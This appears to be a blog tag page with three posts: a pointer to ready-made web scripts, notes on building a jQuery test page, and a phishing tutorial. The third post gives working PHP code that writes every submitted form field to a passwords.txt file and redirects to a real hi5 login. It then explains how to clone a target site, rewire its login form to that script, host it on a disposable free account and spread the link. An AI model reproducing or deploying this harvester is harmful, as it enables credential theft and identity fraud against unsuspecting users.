head-up-loaded
Posts tagged php
Ready to go web-scripts
Dec 9th
An extensive selection of ready-to-go scripts in java, DHTML, asp etc. You don’t have to worry about writing scripts for floating divs and other such effects. It is always easier to copy paste the script and make small changes as needed.
These scripts make your work easier. All the huge typing work is cut off. Basic editing of the scripts can be done for a custom design and function.
Two such places where you can find huge list of free to use such scripts are:
Related articles by Zemanta
- CSS/Javascript Text Resize (groovysoup.com)
- JavaScript Gaining Traction with Game Developers (ajaxian.com)
- jQuery for Beginners: Making Your Website Cool (woorkup.com)
- Website Design (idealist.org)
Web Designing Practice 101
Nov 29th
[Test Page] Best viewed with Firefox 3.5 A test page I created using some basic photoshop. The slices I cut from the psd are as below. [images]
Curved DIV: There are many ways to create curved DIVs, but I preferred using a simpler method I found while surfing the internet. The curvature of the DIV tags is a simple code, can be found here:
IE as expected doesn’t support the code, so a downloadable file is included at the above URL. The download htc file isn’t completely bug free. DIV height problems are still noticeable. Plus using it with the jQuery with it gave me hundreds of problems. I preferred to keep my design sharp edged for IE people.
The CSS style sheet can be accessed here [StyleSheet]. It is a bit messed up so have patience.
jQuery: The jquery was copied from the tutorial. Made many changes to the CSS according to my design. It required variable height so, I used just the min-height property on the content DIV.
Known Bugs and Problems: Right now the fact that the page is static is disturbing. It has to be evolved into a php dynamic page. Loading of all the posts in a single page load will increase load times later. Also there will be problem monitoring post statistics separately (indexing, meta, visitors). Another problem I have to overcome is the embedding of a flash movie in the jQuery DIV. Please report any other bugs and suggestions to indigoanalysis@gmail.com
All about Phishing, How to do it…..
Jan 29th
“Phishing is a technique used to gain personal information for purposes of identity theft”.
Phishing is the most common technique utilised by the Gray hats to steal passwords and other sensitive personal data. Its is always important to know where you are filling in your passwords. The phishing pages created look exactly like the original website in design, though hideous php scripts hiding inside. People who know nothing about php stuff tend to get fooled. Links to such pages usually circulate around the internet through social networking sites, spams, javascripts etc.
Precautions to take inorder to avoid getting hacked.
1. Whenever you are filling in your passwords or any sensitive data, always make a rule to check the address bar. Don’t step forward if you doubt the link there in the address bar.
2. Never use any javascripts provided by a unreliable source.
3. Check your browser’s homepage regularly. Make sure it hasn’t been changed by any recently installed application or a script.
Now for the real part, how to do it? (Not for beginners) queries mail to: indigoanalysis@gmail.com
Suppose you want to create a phishing page of “www123.com”. Firstly go to the website and save its source code to HDD. now make a new php script containing the following code.
<?php
header (‘Location: http://www.hi5.com/friend/login.do ‘);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
now name the php file to say “phisher.php”. Go to the source you saved earlier and in the form replace the action of the form to action = “phisher.php”
Make a text file named passwords.txt
Make an account in free hosting websites( use free one because your account may get deleted for phishing activities) which support php eg: www.bravenet.com or www.t35.com
Upload the html(index.html), php and the text file with your file manager. Distribute your link to the index.html (eg: account.t35.com/index.html)
![Reblog this post [with Zemanta]](http://img.zemanta.com/reblog_e.png?x-id=b50db714-bb37-45b9-bf2c-0b24efae4102)
